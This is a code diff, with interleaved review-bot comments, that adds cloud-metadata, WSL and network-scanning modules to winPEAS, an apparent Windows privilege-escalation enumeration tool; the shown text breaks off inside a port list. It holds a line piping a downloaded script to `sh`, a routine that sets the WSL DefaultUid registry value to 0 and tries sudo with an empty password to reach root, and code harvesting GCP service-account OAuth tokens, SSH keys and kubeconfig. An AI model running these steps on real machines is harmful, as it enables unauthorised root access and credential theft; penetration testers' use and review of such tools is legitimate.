@@ -0,0 +1,77 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Net; +using System.Net.Sockets; +using System.Text; + +namespace winPEAS.Info.CloudInfo +{ + internal abstract class CloudInfoBase + { + public abstract string Name { get; } + + public abstract bool IsCloud { get; } + + public abstract Dictionary> EndpointDataList(); + + public abstract bool TestConnection(); + + private bool? _isAvailable; + public bool IsAvailable + { + get + { + if (_isAvailable == null) + { + _isAvailable = TestConnection(); + } + + return _isAvailable.Value; + } + } + + protected string CreateMetadataAPIRequest(string url, string method, WebHeaderCollection headers = null) + { + try + { + var request = WebRequest.CreateHttp(url); + + if (headers != null) + { + request.Headers = headers; + } + + request.Method = method; + + using (var response = (HttpWebResponse)request.GetResponse()) + { + using (var responseStream = response.GetResponseStream()) + { + // Get a reader capable of reading the response stream + using (var myStreamReader = new StreamReader(responseStream, Encoding.UTF8)) + { + // Read stream content as string + var content = myStreamReader.ReadToEnd(); + + return content; + } + } + } + } + catch (WebException exception) + { + if (exception.InnerException != null) + { + return typeof(SocketException) == exception.InnerException.GetType() ? null : string.Empty; + } + } + catch (Exception ex) + { + return string.Empty; + } + + return string.Empty; + } + } +} diff --git a/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/EndpointData.cs b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/EndpointData.cs new file mode 100644 index 0000000..427486b --- /dev/null +++ b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/EndpointData.cs @@ -0,0 +1,10 @@ +namespace winPEAS.Info.CloudInfo +{ + internal class EndpointData + { + public string EndpointName { get; set; } + public string Data { get; set; } + + public bool IsAttackVector { get; set; } + } +} 
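Review bot: `CreateMetadataAPIRequest` sets no `Timeout`, so when the vendor folder exists but 169.254.169.254 is filtered or IMDS is disabled, each request blocks for the `HttpWebRequest` default of 100 s; worse, a timed-out `WebException` typically carries no `InnerException`, so the method returns `string.Empty` rather than `null`, `TestConnection` reports the service as available, and every subsequent endpoint request repeats the wait. The request also honours any configured system proxy, which should never be on the path to a link-local metadata address. Set short timeouts, bypass the proxy, and treat timeouts and connection failures as "unreachable":
```csharp
var request = WebRequest.CreateHttp(url);
request.Proxy = null;            // never route the link-local metadata address through a system proxy
request.Timeout = 3000;          // fail fast when IMDS is filtered or disabled
request.ReadWriteTimeout = 3000;
// … unchanged: headers, method, response reading …
catch (WebException exception)
{
    // No answer at all (refused, timed out, unresolvable) => null, so TestConnection reports "not available".
    // An HTTP error status (400/404/405) means the service answered; keep returning an empty body for it.
    if (exception.InnerException is SocketException
        || exception.Status == WebExceptionStatus.Timeout
        || exception.Status == WebExceptionStatus.ConnectFailure
        || exception.Status == WebExceptionStatus.NameResolutionFailure)
    {
        return null;
    }
    return string.Empty;
}
```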
diff --git a/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/GCPInfo.cs b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/GCPInfo.cs new file mode 100644 index 0000000..d393b57 --- /dev/null +++ b/winPEAS/winPEASexe/winPEAS/Info/CloudInfo/GCPInfo.cs 
@@ -0,0 +1,208 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Net; +using winPEAS.Helpers; + +namespace winPEAS.Info.CloudInfo +{ + internal class GCPInfo : CloudInfoBase + { + public override string Name => "Google Cloud Platform"; + + const string GCP_BASE_URL = "http://{URL_BASE}/"; + const string GCP_FOLDER = "C:\\Program Files\\Google\\Compute Engine\\"; + + /* + C:\Program Files\Google\Compute Engine\agent\GCEWindowsAgent.exe" + C:\Program Files\Google\OSConfig\google_osconfig_agent.exe" + c:\Program Files (x86)\Google\Cloud SDK" + http://metadata.google.internal + */ + + public override bool IsCloud => Directory.Exists(GCP_FOLDER); + + private Dictionary> _endpointData = null; + + const string METADATA_URL_BASE = "http://metadata.google.internal/computeMetadata/v1"; + + + public override Dictionary> EndpointDataList() + { + if (_endpointData == null) + { + _endpointData = new Dictionary>(); + + try + { + if (IsAvailable) + { + _endpointData.Add("GC Project Info", GetGCProjectMetadataInfo()); + _endpointData.Add("OSLogin Info", GetOSLoginMetadataInfo()); + _endpointData.Add("Instance Info", GetInstanceMetadataInfo()); + _endpointData.Add("Interfaces", GetInterfacesMetadataInfo()); + _endpointData.Add("User Data", GetUserMetadataInfo()); + _endpointData.Add("Service Accounts", GetServiceAccountsMetadataInfo()); + } + else + { + _endpointData.Add("General Info", new List() + { + new EndpointData() + { + EndpointName = "", + Data = null, + IsAttackVector = false + } + }); + } + } + catch (Exception ex) + { + Beaprint.PrintException(ex.Message); + } + } + + return _endpointData; + } + + private List GetServiceAccountsMetadataInfo() + { + var metadataEndpoints = new List>(); + + var serviceAccountsEndpointUrlBase = "instance/service-accounts"; + var url = $"{METADATA_URL_BASE}/{serviceAccountsEndpointUrlBase}"; + var serviceAccounts = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection { { "X-Google-Metadata-Request", 
"True" } }); + + // TODO + // echo " Name: $sa" - ignored for now + + foreach (var serviceAccount in serviceAccounts.Trim().Split('\n')) + { + metadataEndpoints.Add(new Tuple("Email", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}email", false)); + metadataEndpoints.Add(new Tuple("Aliases", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}aliases", false)); + metadataEndpoints.Add(new Tuple("Identity", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}identity", false)); + metadataEndpoints.Add(new Tuple("Scopes", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}scopes", false)); + metadataEndpoints.Add(new Tuple("Token", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}token", false)); + } + + var result = GetMetadataInfo(metadataEndpoints); + + return result; + } + + private List GetUserMetadataInfo() + { + var metadataEndpoints = new List>() + { + new Tuple("startup-script", "instance/attributes/startup-script", false), + }; + + var result = GetMetadataInfo(metadataEndpoints); + + return result; + } + + private List GetInterfacesMetadataInfo() + { + var metadataEndpoints = new List>(); + + var networkEndpointUrlBase = "instance/network-interfaces"; + var url = $"{METADATA_URL_BASE}/{networkEndpointUrlBase}"; + var ifaces = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection { { "X-Google-Metadata-Request", "True" } }); + + foreach (var iface in ifaces.Trim().Split('\n')) + { + metadataEndpoints.Add(new Tuple("IP", $"{networkEndpointUrlBase}/{iface}ip", false)); + metadataEndpoints.Add(new Tuple("Subnetmask", $"{networkEndpointUrlBase}/{iface}subnetmask", false)); + metadataEndpoints.Add(new Tuple("Gateway", $"{networkEndpointUrlBase}/{iface}gateway", false)); + metadataEndpoints.Add(new Tuple("DNS", $"{networkEndpointUrlBase}/{iface}dns-servers", false)); + metadataEndpoints.Add(new Tuple("Network", $"{networkEndpointUrlBase}/{iface}network", false)); + } + + var result = GetMetadataInfo(metadataEndpoints); + + return result; + } + + private 
List GetInstanceMetadataInfo() + { + var metadataEndpoints = new List>() + { + new Tuple("Instance Description", "instance/description", false), + new Tuple("Hostname", "instance/hostname", false), + new Tuple("Instance ID", "instance/id", false), + new Tuple("Instance Image", "instance/image", false), + new Tuple("Machine Type", "instance/machine-type", false), + new Tuple("Instance Name", "instance/name", false), + new Tuple("Instance tags", "instance/scheduling/tags", false), + new Tuple("Zone", "instance/zone", false), + new Tuple("K8s Cluster Location", "instance/attributes/cluster-location", false), + new Tuple("K8s Cluster name", "instance/attributes/cluster-name", false), + new Tuple("K8s OSLoging enabled", "instance/attributes/enable-oslogin", false), + new Tuple("K8s Kube-labels", "instance/attributes/kube-labels", false), + new Tuple("K8s Kubeconfig", "instance/attributes/kubeconfig", false), + new Tuple("K8s Kube-env", "instance/attributes/kube-env", false), + }; + + var result = GetMetadataInfo(metadataEndpoints); + + return result; + + } + private List GetOSLoginMetadataInfo() + { + var metadataEndpoints = new List>() + { + new Tuple("OSLogin users", "oslogin/users", false), + new Tuple("OSLogin Groups", "oslogin/groups", false), + new Tuple("OSLogin Security Keys", "oslogin/security-keys", false), + new Tuple("OSLogin Authorize", "oslogin/authorize", false), + }; + + var result = GetMetadataInfo(metadataEndpoints); + + return result; + } + + private List GetGCProjectMetadataInfo() + { + var metadataEndpoints = new List>() + { + new Tuple("Project-ID", "project/project-id", false), + new Tuple("Project Number", "project/numeric-project-id", false), + new Tuple("Project SSH-Keys", "project/attributes/ssh-keys", false), + new Tuple("All Project Attributes", "project/attributes/?recursive=true", false), + }; + + var result = GetMetadataInfo(metadataEndpoints); + + return result; + } + + private List GetMetadataInfo(List> endpointData) + { + List 
_endpointDataList = new List(); + + foreach (var tuple in endpointData) + { + string url = $"{METADATA_URL_BASE}/{tuple.Item2}"; + var result = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection { { "X-Google-Metadata-Request", "True" } }); + + _endpointDataList.Add(new EndpointData() + { + EndpointName = tuple.Item1, + Data = result?.Trim(), + IsAttackVector = tuple.Item3 + }); + } + + return _endpointDataList; + } + + public override bool TestConnection() + { + return CreateMetadataAPIRequest(GCP_BASE_URL, "GET") != null; + } + } +} diff --git a/winPEAS/winPEASexe/winPEAS/Info/FilesInfo/WSL/WSLHelper.cs b/winPEAS/winPEASexe/winPEAS/Info/FilesInfo/WSL/WSLHelper.cs new file mode 100644 index 0000000..7cce295 --- /dev/null +++ b/winPEAS/winPEASexe/winPEAS/Info/FilesInfo/WSL/WSLHelper.cs 
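Review bot: `GCP_BASE_URL = "http://{URL_BASE}/"` is a plain string literal, not an interpolated one, so `TestConnection` asks `CreateMetadataAPIRequest` for a URI whose host is the literal `{URL_BASE}`; `WebRequest.CreateHttp` throws on it, the generic catch in the base class returns `string.Empty`, and `IsAvailable` is therefore `true` whenever the Compute Engine folder exists — the connectivity check never touches the metadata server. Probe the real endpoint instead, `public override bool TestConnection() => CreateMetadataAPIRequest($"{METADATA_URL_BASE}/", "GET", new WebHeaderCollection { { "Metadata-Flavor", "Google" } }) != null;`, and drop the unused constant. Google documents `Metadata-Flavor: Google` as the required request header; `X-Google-Metadata-Request: True` is the older form, so if it is kept for compatibility, sending both is harmless. The `Token` entry under each service account returns a live OAuth access token yet is flagged `IsAttackVector = false`, unlike the Azure tokens; it deserves the same flag.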
@@ -0,0 +1,136 @@ +using System; +using System.Diagnostics; +using System.Text; +using winPEAS.Helpers.Registry; + +namespace winPEAS.Info.FilesInfo.WSL +{ + public class WSLHelper + { + public static void RunLinpeas(string linpeasUrl) + { + string linpeasCmd = $"curl -L {linpeasUrl} --silent | sh"; + var cmd = CreateUnixCommand(linpeasCmd); + + ExecuteCommand(cmd.Item1, cmd.Item2); + } + + internal static Tuple CreateUnixCommand(string command, string distributionName = null) + { + string wsl = Environment.Is64BitProcess + ? "wsl.exe" + : Environment.GetEnvironmentVariable("WinDir") + "\\SysNative\\wsl.exe"; + string distributionParam = !string.IsNullOrEmpty(distributionName) + ? $"--distribution {distributionName}" + : string.Empty; + string args = $"{distributionParam} -- {command}"; + + return new Tuple(wsl, args); + } + + static string GetWSLUser(string distributionName) + { + string command = "whoami"; + + var cmd = CreateUnixCommand(command, distributionName); + var user = ExecuteCommandWaitForOutput(cmd.Item1, cmd.Item2)?.Trim(); + + return user; + } + + internal static string TryGetRootUser(string distributionName, string distributionGuid) + { + string hive = "HKCU"; + string path = @$"SOFTWARE\Microsoft\Windows\CurrentVersion\Lxss\{distributionGuid}"; + string key = "DefaultUid"; + string wslUser = GetWSLUser(distributionName); + string exploit = $"change registry value: '{hive}\\{path}\\{key}' to 0"; + string root = $"root ({exploit})"; + + if (string.Equals(wslUser, "root")) + { + return "root"; + } + var originalDefaultUserValue = RegistryHelper.GetRegValue(hive, path, key); + + var isValueChanged = RegistryHelper.WriteRegValue(hive, path, key, 0.ToString()); + if (isValueChanged) + { + wslUser = GetWSLUser(distributionName); + + if (string.Equals(wslUser, "root")) + { + RegistryHelper.WriteRegValue(hive, path, key, originalDefaultUserValue); + + return root; + } + } + + // try sudo without password + exploit = "sudo with empty password"; + var cmd = 
CreateUnixCommand("echo -n '' | sudo -S su root -c whoami", distributionName); + var output = ExecuteCommandWaitForOutput(cmd.Item1, cmd.Item2); + + if (output == "root") + { + return $"root ({exploit})"; + } + + return wslUser; + } + + private static string ExecuteCommandWaitForOutput(string cmd, string args) + { + Process p = new Process(); + p.StartInfo.UseShellExecute = false; + p.StartInfo.RedirectStandardOutput = true; + p.StartInfo.RedirectStandardError = true; + p.StartInfo.FileName = cmd; + p.StartInfo.Arguments = args; + p.StartInfo.StandardOutputEncoding = Encoding.UTF8; + p.Start(); + + string output = p.StandardOutput.ReadToEnd()?.Trim(); + + p.WaitForExit(); + + return output; + } + + private static void ExecuteCommand( + string command, + string args = null, + string workingFolder = null + ) + { + var processStartInfo = new ProcessStartInfo + { + UseShellExecute = false, + Verb = "OPEN", + CreateNoWindow = true, + FileName = command, + WorkingDirectory = workingFolder, + Arguments = args, + RedirectStandardOutput = true, + RedirectStandardError = true, + StandardOutputEncoding = Encoding.UTF8 + }; + + using (var process = Process.Start(processStartInfo)) + { + if (process != null) + { + while (!process.StandardOutput.EndOfStream) + { + Console.WriteLine(process.StandardOutput.ReadLine()); + } + + while (!process.StandardError.EndOfStream) + { + Console.WriteLine(process.StandardError.ReadLine()); + } + } + } + } + } +} diff --git a/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetPinger.cs b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetPinger.cs new file mode 100644 index 0000000..298210a --- /dev/null +++ b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetPinger.cs 
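Review bot: `TryGetRootUser` switches the target's `HKCU\...\Lxss\<guid>\DefaultUid` to 0 and restores `originalDefaultUserValue` only on the success path — if the write succeeds but the following `whoami` does not return `root` (e.g. `wsl.exe` fails, or the running distro instance has to be terminated before `DefaultUid` takes effect), the user's WSL default account is left permanently switched to root by an enumeration tool. Restore it unconditionally in a `finally`; note that `WriteRegValue` as committed opens the key read-only and so cannot succeed yet, which currently masks this. `ExecuteCommandWaitForOutput` also redirects stderr but never reads it, so a child that writes more than the pipe buffer to stderr can deadlock against `ReadToEnd()`; either drop `RedirectStandardError = true` or drain it asynchronously.
```csharp
var isValueChanged = RegistryHelper.WriteRegValue(hive, path, key, 0.ToString());
if (isValueChanged)
{
    try
    {
        wslUser = GetWSLUser(distributionName);
    }
    finally
    {
        // Always undo the DefaultUid change: enumeration must not leave the target reconfigured.
        RegistryHelper.WriteRegValue(hive, path, key, originalDefaultUserValue);
    }

    if (string.Equals(wslUser, "root"))
    {
        return root;
    }
}
// … unchanged: sudo-with-empty-password probe …
```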
@@ -0,0 +1,56 @@ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Net; +using System.Net.NetworkInformation; +using System.Threading.Tasks; + +namespace winPEAS.Info.NetworkInfo.NetworkScanner +{ + internal class NetPinger + { + private int PingTimeout = 1000; + + public List HostsAlive = new List(); + + private List ipRange = new List(); + + public void AddRange(string baseIpAddress, string netmask) + { + var addresses = NetworkUtils.GetIPAddressesByNetmask(baseIpAddress, netmask).ToList(); + var range = NetworkUtils.GetIPRange(IPAddress.Parse(addresses[0]), IPAddress.Parse(addresses[1])); + + ipRange.AddRange(range); + } + + public void AddRange(IEnumerable ipAddressList) + { + ipRange.AddRange(ipAddressList); + } + + public async Task RunPingSweepAsync() + { + var tasks = new List(); + + foreach (var ip in ipRange) + { + Ping p = new Ping(); + var task = PingAndUpdateStatus(p, ip); + tasks.Add(task); + } + + await Task.WhenAll(tasks); + } + + private async Task PingAndUpdateStatus(Ping ping, string ip) + { + var reply = await ping.SendPingAsync(ip, PingTimeout); + + if (reply.Status == IPStatus.Success) + { + HostsAlive.Add(ip); + await Console.Out.WriteLineAsync(ip); + } + } + } +} diff --git a/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkScanner.cs b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkScanner.cs new file mode 100644 index 0000000..d403b6e --- /dev/null +++ b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkScanner.cs 
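Review bot: `HostsAlive.Add(ip)` in `PingAndUpdateStatus` runs on whichever thread-pool thread completes each `SendPingAsync` — in a console process there is no synchronization context to serialize the continuations — so with one task per address the `List<string>` is mutated concurrently and can drop hosts or throw. Guard the add with `lock (HostsAlive) { HostsAlive.Add(ip); }`, or make `HostsAlive` a `ConcurrentBag<string>`. Each `Ping` is also never disposed; create and dispose it inside `PingAndUpdateStatus` with `using (var ping = new Ping())` instead of passing it in. `RunPingSweepAsync` additionally fires every ping at once — a `/16` from `AddRange` means 65k concurrent ICMP sends — so a `SemaphoreSlim` throttle would keep the sweep both quieter and more reliable.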
@@ -0,0 +1,93 @@ +using System; +using System.Collections.Generic; +using System.Threading.Tasks; +using winPEAS.Helpers; + +namespace winPEAS.Info.NetworkInfo.NetworkScanner +{ + internal class NetworkScanner + { + enum ScanMode + { + Auto, + IPAddressList, + IPAddressNetmask, + } + + private string[] ipAddressList; + private bool isAuto = false; + private ScanMode scanMode = ScanMode.IPAddressList; + private string baseAddress; + private string netmask; + IEnumerable ports; + + public NetworkScanner(string options, IEnumerable ports = null) + { + /* + --network "auto" - find interfaces/hosts automatically + --network "10.10.10.10,10.10.10.20" - scan only selected ip address(es) + --network "10.10.10.10/24" - scan host based on ip address/netmask + */ + this.ports = ports; + + if (string.Equals(options, "auto", StringComparison.InvariantCultureIgnoreCase)) + { + scanMode = ScanMode.Auto; + } + else if (options.Contains("/")) + { + var parts = options.Split('/'); + baseAddress = parts[0]; + netmask = parts[1]; + scanMode = ScanMode.IPAddressNetmask; + } + else + { + ipAddressList = options.Split(','); + scanMode = ScanMode.IPAddressList; + } + } + + public void Scan() + { + try + { + Beaprint.GreatPrint("Scanning network (it might take some time)..."); + + List aliveHosts = new List(); + NetPinger netPinger = new NetPinger(); + + if (scanMode == ScanMode.Auto) + { + // this is the "auto" mode + foreach (var ipAddressAndNetmask in NetworkUtils.GetInternalInterfaces()) + { + netPinger.AddRange(ipAddressAndNetmask.Item1, ipAddressAndNetmask.Item2); + } + } + if (scanMode == ScanMode.IPAddressNetmask) + { + netPinger.AddRange(baseAddress, netmask); + } + else if (scanMode == ScanMode.IPAddressList) + { + netPinger.AddRange(ipAddressList); + } + + var task = netPinger.RunPingSweepAsync(); + task.Wait(); + aliveHosts.AddRange(netPinger.HostsAlive); + + PortScanner ps = new PortScanner(this.ports); + Parallel.ForEach(aliveHosts, host => + { + ps.Start(host); + }); + } + 
catch (Exception e) + { + Beaprint.PrintException(e.Message); + } + } + } +} diff --git a/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkUtils.cs b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkUtils.cs new file mode 100644 index 0000000..9e7757f --- /dev/null +++ b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkUtils.cs 
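Review bot: The mode dispatch in `Scan` is written as `if (Auto) ... if (IPAddressNetmask) ... else if (IPAddressList)` — three exclusive cases where the first is not part of the chain — and the `isAuto` field is never read; a `switch (scanMode)` with the three cases reads as the single decision it is and lets the compiler flag an unhandled mode. The constructor also accepts `"10.10.10.10/"` or `"a/b/c"` without complaint, deferring the failure to `Convert.ToInt32(mask)` in `GetIpUintRange`; checking `parts.Length == 2` and `IPAddress.TryParse(baseAddress, out _)` there, with a `Beaprint` message naming the bad `--network` value, gives the user a usable error instead of the generic exception text. `task.Wait()` on `RunPingSweepAsync` is acceptable in this console flow but deserves a one-line comment saying so, since blocking on a task is the pattern reviewers usually flag.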
@@ -0,0 +1,221 @@ +using System; +using System.Collections.Generic; +using System.ComponentModel; +using System.Linq; +using System.Net; +using System.Net.NetworkInformation; + +namespace winPEAS.Info.NetworkInfo.NetworkScanner +{ + internal static class NetworkUtils + { + + /// + /// IPAddress to UInteger + /// + /// + /// + public static uint IPToUInt(this string ipAddress) + { + if (string.IsNullOrEmpty(ipAddress)) + return 0; + + if (IPAddress.TryParse(ipAddress, out IPAddress ip)) + { + var bytes = ip.GetAddressBytes(); + Array.Reverse(bytes); + return BitConverter.ToUInt32(bytes, 0); + } + else + return 0; + + } + + /// + /// IP in Uinteger to string + /// + /// + /// + public static string IPToString(this uint ipUInt) + { + return ToIPAddress(ipUInt).ToString(); + } + + + /// + /// IP in Uinteger to IPAddress + /// + /// + /// + public static IPAddress ToIPAddress(this uint ipUInt) + { + var bytes = BitConverter.GetBytes(ipUInt); + Array.Reverse(bytes); + return new IPAddress(bytes); + } + + /// + /// First and Last IPv4 from IP + Mask + /// + /// + /// Accepts CIDR or IP. Example 255.255.255.0 or 24 + /// Removes not usable IPs from Range + /// + /// + /// If ´filterUsable=false´ first IP is not usable and last is reserved for broadcast. + /// + public static string[] GetIpRange(string ipv4, string mask, bool filterUsable) + { + uint[] uiIpRange = GetIpUintRange(ipv4, mask, filterUsable); + + return Array.ConvertAll(uiIpRange, x => IPToString(x)); + } + + /// + /// First and Last IPv4 + Mask. + /// + /// + /// Accepts CIDR or IP. Example 255.255.255.0 or 24 + /// Removes not usable IPs from Range + /// + /// + /// First IP is not usable and last is reserverd for broadcast. 
+ /// Can use all IPs in between + /// + public static uint[] GetIpUintRange(string ipv4, string mask, bool filterUsable) + { + uint sub; + //check if mask is CIDR Notation + if (mask.Contains(".")) + { + sub = IPToUInt(mask); + } + else + { + sub = ~(0xffffffff >> Convert.ToInt32(mask)); + } + + uint ip2 = IPToUInt(ipv4); + + + uint first = ip2 & sub; + uint last = first | (0xffffffff & ~sub); + + if (filterUsable) + { + first += 1; + last -= 1; + } + + return new uint[] { first, last }; + } + + public static IEnumerable GetIPRange(IPAddress startIP, IPAddress endIP) + { + uint sIP = ipToUint(startIP.GetAddressBytes()); + uint eIP = ipToUint(endIP.GetAddressBytes()); + while (sIP <= eIP) + { + yield return new IPAddress(reverseBytesArray(sIP)).ToString(); + sIP++; + } + } + + public static string CidrToNetmask(int cidr) + { + var nmask = 0xFFFFFFFF; + nmask <<= 32 - cidr; + byte[] bytes = BitConverter.GetBytes(nmask); + Array.Reverse(bytes); + nmask = BitConverter.ToUInt32(bytes, 0); + var netmask = new System.Net.IPAddress(nmask); + return netmask.ToString(); + } + + public static IEnumerable GetIPAddressesByNetmask(string ipAddress, string netmask) + { + // TODO + // e.g. + // netmask should be e.g. 24 - currently we only support this format + string[] range = NetworkUtils.GetIpRange(ipAddress, netmask, false); + + return range; + } + + public static IEnumerable GetHostsByIPAndNetmask(string ipAddressAndNetmask) + { + // TODO + // get hosts by ip address & netmask + + // https://itecnote.com/tecnote/c-proper-way-to-scan-a-range-of-ip-addresses/ + // we nned to (maybe in parallel) + // - ping e.g. 
3 times + // - scan top 5 ports + var parts = ipAddressAndNetmask.Split(':'); + + return new List + { + parts[0] + }; + } + + public static List> GetInternalInterfaces() + { + List> result = new List>(); + + foreach (NetworkInterface ni in NetworkInterface.GetAllNetworkInterfaces()) + { + if (ni.OperationalStatus == OperationalStatus.Up && + (ni.NetworkInterfaceType == NetworkInterfaceType.Wireless80211 || ni.NetworkInterfaceType == NetworkInterfaceType.Ethernet)) + { + // Console.WriteLine(); + foreach (UnicastIPAddressInformation ip in ni.GetIPProperties().UnicastAddresses) + { + if (ip.Address.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork) + { + // we need ip address and a netmask as well + result.Add(new Tuple(ip.Address.ToString(), ip.IPv4Mask.ToString())); + } + } + } + } + + return result; + } + + /* Convert bytes array to 32 bit long value */ + static uint ipToUint(byte[] ipBytes) + { + ByteConverter bConvert = new ByteConverter(); + uint ipUint = 0; + + int shift = 24; // indicates number of bits left for shifting + foreach (byte b in ipBytes) + { + if (ipUint == 0) + { + ipUint = (uint)bConvert.ConvertTo(b, typeof(uint)) << shift; + shift -= 8; + continue; + } + + if (shift >= 8) + ipUint += (uint)bConvert.ConvertTo(b, typeof(uint)) << shift; + else + ipUint += (uint)bConvert.ConvertTo(b, typeof(uint)); + + shift -= 8; + } + + return ipUint; + } + + /* reverse byte order in array */ + private static uint reverseBytesArray(uint ip) + { + byte[] bytes = BitConverter.GetBytes(ip); + bytes = bytes.Reverse().ToArray(); + return (uint)BitConverter.ToInt32(bytes, 0); + } + } +} diff --git a/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/PortScanner.cs b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/PortScanner.cs new file mode 100644 index 0000000..ca8b229 --- /dev/null +++ b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/PortScanner.cs 
@@ -0,0 +1,122 @@
+using System;
+using System.Collections.Generic;
+using System.Net.Sockets;
+using System.Threading;
+using System.Threading.Tasks;
+
+namespace winPEAS.Info.NetworkInfo.NetworkScanner
+{
+ class PortScanner
+ {
+ private int TcpTimeout = 500; // ms
+
+ #region nmap tcp top 1000
+
+ static List nmapTop1000TCPPorts = new List
+ {
+ 1,3,4,6,7,9,13,17,19,20,21,22,23,24,25,26,30,32,33,37,42,43,49,53,70,79,80,81,82,83,84,85,88,89,90,99,100,106,109,110,111,113,119,125,135,139,143,144,146,161,163,
+ 179,199,211,212,222,254,255,256,259,264,280,301,306,311,340,366,389,406,407,416,417,425,427,443,444,445,458,464,465,481,497,500,512,513,514,515,524,541,543,544,545,
+ 548,554,555,563,587,593,616,617,625,631,636,646,648,666,667,668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800,801,808,843,873,880,888,898,900,901,
+ 902,903,911,912,981,987,990,992,993,995,999,1000,1001,1002,1007,1009,1010,1011,1021,1022,1023,1024,1025,1026,1027,1028,1029,1030,1031,1032,1033,1034,1035,1036,1037,
+ 1038,1039,1040,1041,1042,1043,1044,1045,1046,1047,1048,1049,1050,1051,1052,1053,1054,1055,1056,1057,1058,1059,1060,1061,1062,1063,1064,1065,1066,1067,1068,1069,1070,
+ 1071,1072,1073,1074,1075,1076,1077,1078,1079,1080,1081,1082,1083,1084,1085,1086,1087,1088,1089,1090,1091,1092,1093,1094,1095,1096,1097,1098,1099,1100,1102,1104,1105,
+ 1106,1107,1108,1110,1111,1112,1113,1114,1117,1119,1121,1122,1123,1124,1126,1130,1131,1132,1137,1138,1141,1145,1147,1148,1149,1151,1152,1154,1163,1164,1165,1166,1169,
+ 1174,1175,1183,1185,1186,1187,1192,1198,1199,1201,1213,1216,1217,1218,1233,1234,1236,1244,1247,1248,1259,1271,1272,1277,1287,1296,1300,1301,1309,1310,1311,1322,1328,
+ 1334,1352,1417,1433,1434,1443,1455,1461,1494,1500,1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687,1688,1700,1717,1718,1719,1720,1721,1723,1755,
+ 1761,1782,1783,1801,1805,1812,1839,1840,1862,1863,1864,1875,1900,1914,1935,1947,1971,1972,1974,1984,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007,2008,2009,2010,
+ 2013,2020,2021,2022,2030,2033,2034,2035,2038,2040,2041,2042,2043,2045,2046,2047,2048,2049,2065,2068,2099,2100,2103,2105,2106,2107,2111,2119,2121,2126,2135,2144,2160,
+ 2161,2170,2179,2190,2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381,2382,2383,2393,2394,2399,2401,2492,2500,2522,2525,2557,2601,2602,2604,2605,2607,2608,2638,
+ 2701,2702,2710,2717,2718,2725,2800,2809,2811,2869,2875,2909,2910,2920,2967,2968,2998,3000,3001,3003,3005,3006,3007,3011,3013,3017,3030,3031,3052,3071,3077,3128,3168,
+ 3211,3221,3260,3261,3268,3269,3283,3300,3301,3306,3322,3323,3324,3325,3333,3351,3367,3369,3370,3371,3372,3389,3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689,
+ 3690,3703,3737,3766,3784,3800,3801,3809,3814,3826,3827,3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000,4001,4002,4003,4004,4005,
+ 4006,4045,4111,4125,4126,4129,4224,4242,4279,4321,4343,4443,4444,4445,4446,4449,4550,4567,4662,4848,4899,4900,4998,5000,5001,5002,5003,5004,5009,5030,5033,5050,5051,
+ 5054,5060,5061,5080,5087,5100,5101,5102,5120,5190,5200,5214,5221,5222,5225,5226,5269,5280,5298,5357,5405,5414,5431,5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,
+ 5633,5666,5678,5679,5718,5730,5800,5801,5802,5810,5811,5815,5822,5825,5850,5859,5862,5877,5900,5901,5902,5903,5904,5906,5907,5910,5911,5915,5922,5925,5950,5952,5959,
+ 5960,5961,5962,5963,5987,5988,5989,5998,5999,6000,6001,6002,6003,6004,6005,6006,6007,6009,6025,6059,6100,6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,
+ 6565,6566,6567,6580,6646,6666,6667,6668,6669,6689,6692,6699,6779,6788,6789,6792,6839,6881,6901,6969,7000,7001,7002,7004,7007,7019,7025,7070,7100,7103,7106,7200,7201,
+ 7402,7435,7443,7496,7512,7625,7627,7676,7741,7777,7778,7800,7911,7920,7921,7937,7938,7999,8000,8001,8002,8007,8008,8009,8010,8011,8021,8022,8031,8042,8045,8080,8081,
+ 8082,8083,8084,8085,8086,8087,8088,8089,8090,8093,8099,8100,8180,8181,8192,8193,8194,8200,8222,8254,8290,8291,8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651,
+ 8652,8654,8701,8800,8873,8888,8899,8994,9000,9001,9002,9003,9009,9010,9011,9040,9050,9071,9080,9081,9090,9091,9099,9100,9101,9102,9103,9110,9111,9200,9207,9220,9290,
